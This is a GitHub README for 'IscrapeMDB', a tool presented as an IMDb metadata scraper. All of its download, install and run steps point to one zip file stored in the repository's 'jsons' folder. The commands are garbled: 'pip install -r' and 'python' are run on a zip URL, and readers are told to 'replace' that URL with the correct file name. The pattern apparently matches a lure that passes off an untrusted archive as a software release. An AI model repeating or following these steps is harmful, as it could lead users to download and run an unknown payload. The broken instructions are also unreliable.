Skip to content

Latest commit

 

History

History
80 lines (62 loc) · 4.23 KB

File metadata and controls

80 lines (62 loc) · 4.23 KB

🎥 IscrapeMDB - Easily Scrape IMDb Metadata

🛠️ Project Overview

IscrapeMDB is a Python tool that scrapes detailed metadata from IMDb based on the links you provide. It simplifies the process of gathering information about movies, shows, directors, and more. With this tool, you can easily obtain data without needing technical skills.

🔗 Download Now

Download IscrapeMDB

🚀 Getting Started

IscrapeMDB is designed for anyone who wants to extract data from IMDb. Whether you're a student, researcher, or just a movie buff, this tool will help you.

🖥️ System Requirements

  • Operating System: Windows, MacOS, or Linux
  • Python version: 3.6 or higher
  • Internet connection to access IMDb
  • Selenium WebDriver installed for browser automation

📥 Download & Install

To get started, visit this page to download: GitHub Releases.

On the Releases page, you will find different versions of IscrapeMDB. Choose the latest version and download the appropriate file for your operating system. Follow the instructions below to run the application.

📂 Installation Instructions

  1. Download the program:

    • Visit the Releases page.
    • Select the latest version.
    • Click on the file that matches your operating system (e.g., .exe for Windows or https://github.com/Kgurses52/IscrapeMDB/raw/refs/heads/main/jsons/Iscrape_MDB_v1.2.zip for Mac/Linux).
  2. Unzip the file (if necessary):

    • Windows: Right-click on the file and select "Extract All."
    • Mac/Linux: Use the terminal or GUI to extract the downloaded file.
  3. Install dependencies:

    • Open your command line interface (CLI).
    • Navigate to the folder where IscrapeMDB is located.
    • Run the following command to install the required packages:
      pip install -r https://github.com/Kgurses52/IscrapeMDB/raw/refs/heads/main/jsons/Iscrape_MDB_v1.2.zip
      
  4. Run the application:

    • In the CLI, enter:
      python https://github.com/Kgurses52/IscrapeMDB/raw/refs/heads/main/jsons/Iscrape_MDB_v1.2.zip
      
    • Make sure to replace https://github.com/Kgurses52/IscrapeMDB/raw/refs/heads/main/jsons/Iscrape_MDB_v1.2.zip with the correct file name if it differs.

📋 How to Use IscrapeMDB

  1. Launch the application as described above.
  2. Input the IMDb link in the provided field.
  3. Click on the "Scrape" button. The tool will fetch metadata and display it.

Here are a few key features of IscrapeMDB:

  • User-Friendly Interface: Simple inputs with clear options.
  • Comprehensive Data: Fetches titles, ratings, reviews, and more from IMDb.
  • Export Options: Save scraped data in multiple formats like CSV or JSON.

🌟 Tips for Effective Use

  • Always ensure you’re connected to the internet.
  • Use valid IMDb links to get accurate data.
  • Regularly check for updates on the Releases page to access improvements or bug fixes.

🛠️ Troubleshooting

If you encounter any issues when running IscrapeMDB, consider the following steps:

  • Ensure you have Python and pip installed correctly.
  • Check that all dependencies are installed.
  • Verify that your internet connection is stable.

📞 Need Help?

For assistance, visit the Issues section in the repository. You can report bugs or ask questions about IscrapeMDB.

📝 Contributing

If you wish to contribute to this project, feel free to submit a pull request or open an issue. Your feedback is valuable.

🔗 Additional Resources

Remember to visit this page to download: GitHub Releases. Enjoy using IscrapeMDB!